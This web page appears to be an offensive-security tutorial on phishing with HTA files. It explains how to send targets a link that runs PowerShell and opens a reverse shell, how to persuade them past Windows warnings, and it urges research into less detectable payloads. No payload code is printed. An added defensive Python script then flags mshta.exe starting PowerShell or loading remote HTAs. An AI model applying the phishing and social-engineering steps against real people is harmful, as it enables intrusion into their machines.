Links: HTA Files

An HTML Application (HTA) is a Microsoft Windows program whose source consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript.

In this example we will be assuming that attachments are not allowed in our emails, so we will need to send the user a direct link, which will bypass any email security and allow the user to download our payload. This attack can also be used as an attachment, but we will skip attaching an HTA file and add it directly onto our link so the browser knows what needs to be done once the link is clicked.


I wrote a simple script which automatically creates a simple HTA file that will execute PowerShell code. It is very simple and will not bypass anything, but in this example we did our work and can bypass anything.

HTA File which will execute a PowerShell Command

By saving this file with an HTA extension we can send it to our target and have it executed. Remember that these techniques need user execution/interaction, so the reason you give in your phishing email for why the file needs to be opened should be a good one.

We start a webserver and add this onto our Email with the File included.

This can be considered an attachment phishing technique; the difference here is that our attachment contains no code for execution, it just hosts our link.

The target opens our file or email, which contains the link in its body. If you have noticed, I put the body of this email in an attachment; you can also use the attachment techniques to deliver links, as it's not that uncommon for PDF files or other types of documents to contain links as references for other things.

Once the target clicks on it, they should receive prompts or warning messages, for which we need a good excuse so that the target has these executed.

After clicking OK, the payload should execute with no issues on the target machine.

We see a warning on the Test.hta file that we try to execute; this file needs to be downloaded and executed.

Then we successfully get a Reverse Shell on our Attacking Machine.

OK, OK, so you might be asking yourself: what's with ALL those warnings? Well, Windows got more efficient at detecting these attacks and knows the common extensions used in these payloads. It's efficient, but the techniques we are using are very simple: they are not obfuscated, encrypted, or in any way using some advanced method for bypassing. Remember these are just small examples in the most basic form, and it's always good to do some research on how you can create more undetectable payloads.
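From the defender's side, the chain described above (a clicked link, an HTA opened by the Windows HTA host `mshta.exe`, then PowerShell) shows up in process-creation telemetry. The detection logic below is an added example, not code from the original page; the event shape (Sysmon Event ID 1 field names), the sample events, the `example.test` host and the rule names are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample events using Sysmon Event ID 1 field names
# (Image, CommandLine, ParentImage); none are taken from the page.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\Downloads\Test.hta",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Write-Output constructed",
     "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://files.example.test/Test.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
LAUNCHERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(path):
    # PureWindowsPath parses Windows paths on any OS the analysis runs on.
    return PureWindowsPath(path).name.lower()

def classify(event):
    """Return the rule names (hypothetical labels) that one event matches."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    findings = []
    # An HTA whose script starts a shell or another script interpreter.
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        findings.append("hta-spawned-interpreter")
    if image == "mshta.exe":
        if URL_RE.search(cmdline):      # HTA fetched straight from a URL
            findings.append("mshta-remote-url")
        if parent in LAUNCHERS:         # opened from a browser or mail client
            findings.append("mshta-from-browser-or-mail")
    return findings

def scan(events):
    """Return (index, findings) for every event that matched a rule."""
    return [(i, f) for i, e in enumerate(events) if (f := classify(e))]
```

Where HTA has no business use, blocking `mshta.exe` through application control removes the chain rather than only detecting it.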
